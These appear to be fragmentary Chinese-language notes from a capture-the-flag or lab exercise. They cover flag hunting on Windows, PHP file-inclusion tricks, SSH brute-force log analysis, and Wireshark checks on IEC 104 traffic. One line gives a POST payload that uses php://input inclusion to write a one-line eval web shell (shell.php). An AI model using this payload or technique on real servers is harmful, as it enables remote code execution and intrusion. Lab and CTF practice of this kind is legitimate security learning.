JNPX

靶机 192.168.111.117

处理windows 乱码问题

chcp 65001

type flag.txt

brew install vim --override-system-vi

# 在.目录及所有子目录中找出所有文件名中包含flag的文件

C:\Users\cashey\Desktop>for /r . %i in (*flag*) do @echo %i

http://127.0.0.1/cmd.php`?file=php://input`

[POST DATA]

也可以POST如下内容生成一句话： <?php fputs(fopen(“shell.php”,”w”),’<?php eval($_POST["cmd"];?>’);?>

?file=compress.zlib://./ev64.txt.zip.gif

日志分析

爆破ssh

20:48

ip17

历史

开启wireshark的TCP校验和功能，某某版默认被关闭了

分析》专家信息

过滤iec 104

追踪流

原始数据

找不合法的控制命令